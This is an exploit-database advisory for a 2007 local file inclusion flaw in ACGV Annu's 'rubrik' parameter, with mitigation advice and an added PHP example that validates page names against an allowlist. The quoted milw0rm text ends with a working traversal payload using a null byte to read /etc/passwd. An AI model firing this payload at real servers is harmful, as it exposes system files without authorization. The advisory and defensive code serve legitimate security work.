vendor:
by: BeyazKurt
CVSS: 5.5 (MEDIUM)
Local File Inclusion
CWE: 22
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

ACGV Annu (rubrik) Local File Inclusion Exploit

This exploit allows an attacker to include files from the server's file system by manipulating the 'rubrik' parameter in the URL. By using '../' to navigate to directories above the web root, the attacker can access sensitive files such as '/etc/passwd'.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate any file paths used in the application. Additionally, access controls should be implemented to restrict unauthorized access to sensitive files.
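
One way to apply the mitigation above in PHP, as an added example that is not ACGV Annu's code or part of the original advisory: the parameter is matched against an allowlist, and the resolved path is confirmed to stay inside the pages directory. The function name resolve_page(), the allowlist entries and the temporary directory layout are assumptions made for illustration.

```php
<?php
// Added example. resolve_page(), the allowlist and the directory layout are
// hypothetical; this is not the code of theme/acgv.php.

function resolve_page(string $raw, string $baseDir, array $allowed): ?string
{
    // PHP has already URL-decoded the parameter, so "%00" arrives as a NUL byte.
    if (strpos($raw, "\0") !== false) {
        return null;
    }
    // Allowlist: only exact, known page names are accepted, so "../" never
    // reaches the filesystem.
    if (!in_array($raw, $allowed, true)) {
        return null;
    }
    // Defence in depth: canonicalise and confirm the file is inside $baseDir
    // (catches symlinks and mistakes in the allowlist itself).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $raw . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Demo on constructed input; runs only from the command line.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi_demo_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', "<?php // constructed page\n");
    $allowed = ['home', 'contact'];   // constructed allowlist

    $samples = ['home', 'contact', '../../../etc/passwd', "../../../etc/passwd\0", 'home/../home'];
    foreach ($samples as $s) {
        $r = resolve_page($s, $dir, $allowed);
        printf("%-30s => %s\n", json_encode($s), $r === null ? 'rejected' : 'include ' . $r);
    }
    unlink($dir . DIRECTORY_SEPARATOR . 'home.php');
    rmdir($dir);
}
```

In an application the caller would pass `$_GET['rubrik']` and include the returned path only when it is not null.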

Exploit-DB raw data:

# BeyazKurt - B3yazKurt@Hotmail.Com
#
# ACGV Annu (rubrik) Local File Inclusion Exploit
#
# Lamers are roaming around, watch out! Don't fall victim to a Tr0jan accident!!
#
# Www.HackSafety.Com // A new era in hacking ...
#
# HackSafety.Com & WorldHackerz.Net Brotherhood...
#
# rerere rararara bjk bjk MUAHAHAH
#
# They carve the cup out of stone, oh they carve it, this is how it goes for Beşiktaş ... for bjk ... !!
#
# Download : http://www.phpscripts-fr.net/scripts/download.php?id=1107

/theme/acgv.php?rubrik=../../../etc/passwd%00

# milw0rm.com [2007-05-07]